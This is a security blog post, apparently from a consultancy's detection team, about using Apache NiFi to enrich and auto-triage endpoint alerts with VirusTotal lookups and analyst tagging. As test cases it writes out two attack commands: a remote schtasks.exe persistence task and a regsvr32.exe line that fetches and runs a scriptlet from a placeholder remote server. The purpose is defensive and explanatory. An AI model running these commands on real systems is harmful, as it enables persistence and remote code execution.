By Paul Bottomley, Endpoint Threat Detection and Response Lead, and
Wietze Beukema, Endpoint Threat Detection and Response Analyst.
This is the second part of our ‘Signal the ATT&CK’ article, where we explore security orchestration and automation (collectively referred to as orchestration) and its use in enhancing our Endpoint Detection and Response (EDR) capability. In part 1, we discussed the use of the MITRE ATT&CK matrix and MITRE’s CALDERA in our Tanium Signal development and testing process. Since part 1 was published, we have added 150 Signals to our rule base, which takes the total number of Signals in our detection set to well over 500. Our current ATT&CK coverage can be seen in the diagram below, which is taken from the ATT&CK Navigator. Techniques we have developed Signals for are highlighted in green. Those highlighted in grey we deem out of scope from an endpoint threat detection perspective, and better suited to other technologies such as Network Intrusion Detection Systems (NIDS).
Our journey into orchestration began when we redesigned our back-end EDR platform. The high-level concept was to take Tanium Signal alerts and pass them through a scalable data processing pipeline, where they would be committed to an Elasticsearch cluster for a team of analysts to triage. Our approach made use of human-centered design: “...a human-centered approach fuels the creation of products that resonate more deeply with an audience - ultimately driving engagement and growth”. This concept is important because many products fail not because the team failed to build what it set out to build, but because it built the wrong product, one that does not take into account what the problem is and why the problem matters.
The human perspective of the design process began with creating personas. We defined multiple ‘threat detection analyst’ personas, which very quickly surfaced a number of interesting behaviours and pain-points. Two of these, both related to orchestration, are the focus of this article:
Alert overload - Commonly referred to as ‘alert fatigue’, this is where analysts are inundated with detections. Ultimately, this leads to an increase in operational risk due to detections being overlooked; and,
Frustration of manual enrichment - Having to manually look up indicators against threat intelligence datasets, and manually pull related endpoint artefacts.
These two pain-points led to the following design principles:
1. [Alert overload] - The platform needs to suppress known false positive (FP) events;
2. [Alert overload] - The platform needs to auto-categorise known true positive (TP) events;
3. [Frustration of manual enrichment] - The platform needs to automatically enrich indicators against threat intelligence datasets; and,
4. [Frustration of manual enrichment] - The platform needs to automatically acquire related process, network, file and Windows Registry artefacts.
For the remainder of this article, points 3 and 4 will be collectively referred to as ‘enrichment’.
By considering these design principles, we sought to identify a highly configurable component that would act as a layer of connective tissue within our threat detection ecosystem, allowing us to automate the flow of data between systems and execute decisions. This led us to Apache NiFi (“NiFi”).
NiFi is an open-source dataflow automation tool, maintained by the Apache Software Foundation. The Java-powered software uses flow-based programming concepts to perform a sequence of tasks based on information it processes. Simply put, it is a tool that manages the flow and transformation of information between systems.
NiFi’s flow-based approach makes it a powerful means to manage complex dataflows - its graphical interface visualises the flow of data in real-time, identifies current bottlenecks, and provides the flexibility to modify flows. In addition, due to its highly scalable structure, it is both efficient and flexible when handling high volumes of data.
Data in NiFi takes the form of flowfiles, which consist of content (the actual data) and supporting attributes. At the start of a dataflow, the flowfile only contains raw data, and at the end of a dataflow it is typically transformed and enriched. This is achieved using processors, which are used to consume, analyse and transform data. Out of the box, NiFi includes a comprehensive set of processors, which allows seamless integration to existing data sources such as SQL-based databases, Elasticsearch, MongoDB and Kafka instances. These capabilities make NiFi a very powerful tool for orchestration.
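To make the flowfile and processor concepts concrete, here is a minimal conceptual sketch in Python. It is not NiFi's API (NiFi processors are Java components wired together in its graphical interface); the `FlowFile` class and the `extract_md5`, `mark_parsed` and `run_flow` names are hypothetical and exist only to illustrate content, attributes and a chain of processors.

```python
import json
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List


@dataclass
class FlowFile:
    """Conceptual stand-in for a NiFi flowfile: raw content plus attributes."""
    content: bytes
    attributes: Dict[str, str] = field(default_factory=dict)


# In this sketch a "processor" is simply a function from flowfile to flowfile.
Processor = Callable[[FlowFile], FlowFile]

MD5_PATTERN = re.compile(r"^[0-9a-fA-F]{32}$")


def extract_md5(flowfile: FlowFile) -> FlowFile:
    """Copy the 'md5' value from JSON content into an attribute if it is well formed."""
    document = json.loads(flowfile.content)
    md5 = str(document.get("md5", ""))
    if MD5_PATTERN.match(md5):
        flowfile.attributes["md5"] = md5.lower()
    return flowfile


def mark_parsed(flowfile: FlowFile) -> FlowFile:
    """Record that the flowfile has passed through the parsing stage."""
    flowfile.attributes["parsed"] = "true"
    return flowfile


def run_flow(flowfile: FlowFile, processors: List[Processor]) -> FlowFile:
    """Pass a flowfile through each processor in order, as a dataflow would."""
    for processor in processors:
        flowfile = processor(flowfile)
    return flowfile
```

The flowfile starts with raw content only and picks up attributes as it moves through the chain, which mirrors the description above of data being transformed and enriched by the end of a dataflow.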
Over the last few months, we’ve been implementing our design principles in a NiFi dataflow. Tanium Signal alerts, as well as broad sets of telemetry acquired using the Tanium platform (for example running process details, driver details, and loaded module details) are passed through a scalable pipeline before being indexed in an Elasticsearch cluster. NiFi connects to Elasticsearch and the dataflow begins execution.
To explain orchestration in our context, we will describe one of our dataflow components, VirusTotal enrichment, which addresses design principle 3: the platform needs to automatically enrich indicators against threat intelligence datasets.
Our threat intelligence is derived through research conducted by our in-house experts, informed by our global incident response services and a large global network of trusted intelligence sharing relationships. We also enrich against external sources, one being VirusTotal, which we will discuss in this article.
The purpose of this dataflow component, which comprises multiple processors, is to enrich documents in our Elasticsearch cluster that have an MD5 hash with information from VirusTotal. Inevitably, the same MD5 hash will appear on multiple systems, so to keep enrichment efficient we maintain a local cache of VirusTotal results. Every time we want to enrich an MD5 hash, we check the cache first before querying the VirusTotal API.
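The cache-first check described above can be sketched as follows. This is an illustration under stated assumptions rather than our NiFi implementation: the cache is an in-memory dictionary, and `lookup` is a hypothetical callable standing in for the VirusTotal API query, so no real API call or response format is implied.

```python
from typing import Callable, Dict, Optional


class CachedEnricher:
    """Check a local cache before falling back to a remote lookup."""

    def __init__(self, lookup: Callable[[str], Optional[dict]]):
        # 'lookup' is a hypothetical stand-in for the VirusTotal API query.
        self._lookup = lookup
        self._cache: Dict[str, dict] = {}
        self.remote_calls = 0  # counts how often the remote lookup was used

    def enrich(self, md5: str) -> Optional[dict]:
        key = md5.strip().lower()
        # Cache hit: the same hash seen on another system costs no API call.
        if key in self._cache:
            return self._cache[key]
        # Cache miss: query the remote source once and remember the answer.
        self.remote_calls += 1
        result = self._lookup(key)
        if result is not None:
            # Assumption: unknown hashes are not cached, so they are retried later.
            self._cache[key] = result
        return result
```

With a hash that is common across many endpoints, only the first call to `enrich` reaches the remote source; every later call is served from the cache.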
At a high level, the dataflow logic is:
At a more granular level, the steps performed by NiFi are:
The VT Enrichment process group is mainly responsible for querying the VirusTotal API and updating our VirusTotal cache. It also contains logic to call the VirusTotal API to request re-analysis of MD5 hashes if certain conditions are met.
The steps for the VT Enrichment group are:
Whenever something unexpected happens (for example, the VirusTotal API gives an invalid HTTP response code), the affected flowfiles are forwarded to failure, as is also shown in the diagram. Using another set of processors, we log such events, or even notify an analyst straight away via email or Slack integration.
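As a rough illustration of this failure routing, the sketch below splits lookup results into ‘success’ and ‘failure’ groups and logs each failure. The function name is hypothetical, and treating only HTTP 200 as success is an assumption made for the example; in NiFi the equivalent behaviour comes from processor relationships rather than code like this.

```python
import logging
from typing import Dict, Iterable, List, Tuple

logger = logging.getLogger("vt_enrichment")


def route_by_status(responses: Iterable[Tuple[str, int]]) -> Dict[str, List[str]]:
    """Split (md5, http_status) pairs into 'success' and 'failure' groups."""
    routed: Dict[str, List[str]] = {"success": [], "failure": []}
    for md5, status in responses:
        if status == 200:  # assumption: only 200 counts as a valid response
            routed["success"].append(md5)
        else:
            # Log the event; a notification step could be attached here instead.
            logger.warning("Lookup for %s returned HTTP %d; routing to failure", md5, status)
            routed["failure"].append(md5)
    return routed
```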
We will reuse two of the attacker techniques described in part 1 of our blog series to demonstrate our orchestration. Please refer to Microsoft MSDN documentation for a full description of the parameters used in the following examples.
The first example demonstrates the use of schtasks.exe to create the named task ‘myTask’ on remote machine ‘tanium-agent-4’. The execution of this task, which runs under the context of ‘user1’, is set to run daily and invokes ‘c:\windows\temp\payload.exe’.
schtasks.exe /s tanium-agent-4 /u user1 /p <password> /create /tn myTask /tr c:\windows\temp\payload.exe /sc DAILY
Executing this command will trigger the following Signal:
Without the use of our NiFi dataflow, the detection in our analytics platform provides little context to the analyst and is not practical to review, given that no enhanced formatting has been applied. The main focus of triage when this Signal fires is to determine the nature of the payload, in this example ‘c:\windows\temp\payload.exe’.
Taking the pain point ‘frustration of manual enrichment’, our goal is to provide the analyst with a richer and more comprehensive understanding of the alert, which increases the degree of confidence when analysing the detection. Orchestration in this context involves:
Once our NiFi dataflow has processed this alert, the detection looks very different in our platform. The analyst is presented with a nicely parsed process tree and can conclude ‘c:\windows\temp\payload.exe’ is malicious based on the ‘schtask_outcome’ field reporting the executable file as ‘mimikatz’.
Pulling related endpoint artefacts on the schtasks.exe process did not yield any further context in this example.
We have also created the ability for an analyst to mark a detection as ‘good’, ‘suspicious’ or ‘bad’ and even attribute a detection to a threat actor using our ‘tagging’ functionality. In this example, the analyst marks the detection as malicious. Not only will this tag the current event, but the workflow in NiFi will retrospectively tag all historic detections in the platform that are identical to this detection.
Let’s trigger this alert again. Our NiFi dataflow takes care of the subsequent detection by auto-categorising it as malicious, because it is now a known TP event. This addresses the pain point ‘alert overload’: the analyst does not have to review the subsequent alert, as it is automatically reported on a high severity findings dashboard. The same logic is the basis for suppressing known FPs: if the same detection has been marked as ‘good’ by multiple analysts, future detections will be auto-categorised.
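The tagging and auto-categorisation logic can be sketched as below. Several details are assumptions made for illustration only: what makes two detections ‘identical’ (here, the Signal name plus a whitespace- and case-normalised command line), the threshold for ‘multiple analysts’ (here, two), and the `fingerprint` and `TagStore` names themselves.

```python
import hashlib
from collections import defaultdict
from typing import DefaultDict, Optional, Set

GOOD_THRESHOLD = 2  # assumption: 'multiple analysts' means at least two


def fingerprint(signal: str, command_line: str) -> str:
    """Derive a stable key so that identical detections share the same tags."""
    normalised = f"{signal}|{' '.join(command_line.lower().split())}"
    return hashlib.sha256(normalised.encode("utf-8")).hexdigest()


class TagStore:
    """Remember which analysts applied which tag to each detection fingerprint."""

    def __init__(self) -> None:
        # fingerprint -> tag -> set of analysts who applied that tag
        self._tags: DefaultDict[str, DefaultDict[str, Set[str]]] = defaultdict(
            lambda: defaultdict(set)
        )

    def tag(self, fp: str, tag: str, analyst: str) -> None:
        self._tags[fp][tag].add(analyst)

    def auto_category(self, fp: str) -> Optional[str]:
        """Return 'bad' or 'good' when a future detection can skip manual triage."""
        tags = self._tags.get(fp)
        if not tags:
            return None
        if tags.get("bad"):
            return "bad"  # known TP: report straight to the findings dashboard
        if len(tags.get("good", ())) >= GOOD_THRESHOLD:
            return "good"  # known FP: suppress
        return None  # 'suspicious' or too few votes: leave for an analyst
```

Because tags are stored against the fingerprint rather than an individual event, a single tag applies to historic and future detections with the same fingerprint.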
The following example demonstrates the use of regsvr32.exe to download the remote Windows scriptlet file ‘http://remote_server/payload.sct’.
regsvr32.exe /u /n /s /i:http://remote_server/payload.sct scrobj.dll
Executing this command will trigger the following Signals:
Again, without the use of our NiFi dataflow, the detection in our analytics platform provides little context to the analyst. The focus when this group of Signals fires is to determine the reputation of the remote server the ‘.sct’ file is being pulled from, and any subsequent system activity resulting from the execution of ‘regsvr32.exe’.
Orchestration in this example involves:
If a local file was passed as a command line argument (rather than as a URL), another step in the orchestration process could be to determine the nature of the payload.
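The branching described above, between a URL and a local file, could be decided by inspecting the `/i:` argument of the command line. The sketch below is a hypothetical helper, not part of our dataflow; it only handles the `/i:` form shown in the example and treats anything that is not an http, https or ftp URL as a local file.

```python
import re
from typing import Optional, Tuple

# Matches /i:value or /i:"quoted value" anywhere in the command line.
I_ARGUMENT = re.compile(r'/i:(?:"([^"]+)"|(\S+))', re.IGNORECASE)
URL_SCHEME = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def classify_scriptlet_source(command_line: str) -> Optional[Tuple[str, str]]:
    """Return ('url' | 'local_file', value) for the /i: argument, or None if absent."""
    match = I_ARGUMENT.search(command_line)
    if match is None:
        return None
    value = match.group(1) or match.group(2)
    kind = "url" if URL_SCHEME.match(value) else "local_file"
    return kind, value
```

A ‘url’ result would feed a reputation lookup on the remote server, while a ‘local_file’ result would feed a lookup on the file itself.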
Once again, the detection looks very different in our platform now that our NiFi dataflow has processed this alert. The analyst can conclude straight away the URL is malicious based on the ‘script_outcome’ field reporting a result of ‘malicious’, without having to carry out manual lookups on the URL or the file.
We have also retrieved related endpoint artefacts as a result of regsvr32.exe executing. We observe a ‘.sct’ file being written to disk, a process spawn (‘calc.exe’), and a network connection.
Lastly, an analyst has the ability to comment on detections as well as tag them. A comment can explain why the analyst tagged the event as they did, and can support reporting.
In summary, incorporating NiFi in our EDR process helps us in multiple ways:
Additional insight from Tanium
Tanium’s Cyber Security team have written two articles on applying the ATT&CK matrix when building a detection capability. They discuss developing a mechanism to identify gaps in capability and assigning corresponding risks to those gaps. More information can be found at the following links:
Join us at Tanium CONVERGE in Washington, D.C., on November 12-15, where we will be presenting ‘Signal the ATT&CK’ in greater depth. This will be a fantastic opportunity to meet our EDR team and exchange ideas.
Are you running Tanium in your network? We are more than happy to discuss security orchestration and automation in more depth with you, and how PwC can use it to help enhance your security capability. We also have a comprehensive set of over 500 Signals, which are available on a subscription basis. Our current coverage against the ATT&CK matrix is highlighted in the diagram above.
For more information, drop an email to Paul or Wietze using the contact details below.